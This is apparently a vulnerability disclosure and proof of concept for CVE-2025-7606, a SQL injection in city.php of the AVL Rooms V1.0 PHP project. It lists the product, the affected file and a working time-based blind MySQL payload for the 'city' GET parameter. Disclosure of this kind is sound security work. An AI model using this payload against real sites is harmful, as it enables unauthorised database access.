CVE-2025-7606 PoC — code-projects AVL Rooms city.php sql injection

Source

Associated Vulnerability

Readme

# CVE-2025-7606
code-projects AVL Rooms Project V1.0/city.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
AVL Rooms
# Vendor Homepage
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/
# submitter
dazhi
# Vulnerable File
/city.php
# VERSION(S)
V1.0
# Software Link
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

#  Payload:
---
    city (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: city=1' AND (SELECT 5303 FROM (SELECT(SLEEP(5)))kuAW) AND 'FOfS'='FOfS&date=07/13/2025
---

File Snapshot

 [4.0K]  /data/pocs/d9cd79da1135903bcab5e3c6fbe61aaee42472f8
└── [ 605]  README.md

0 directories, 1 file

Remarks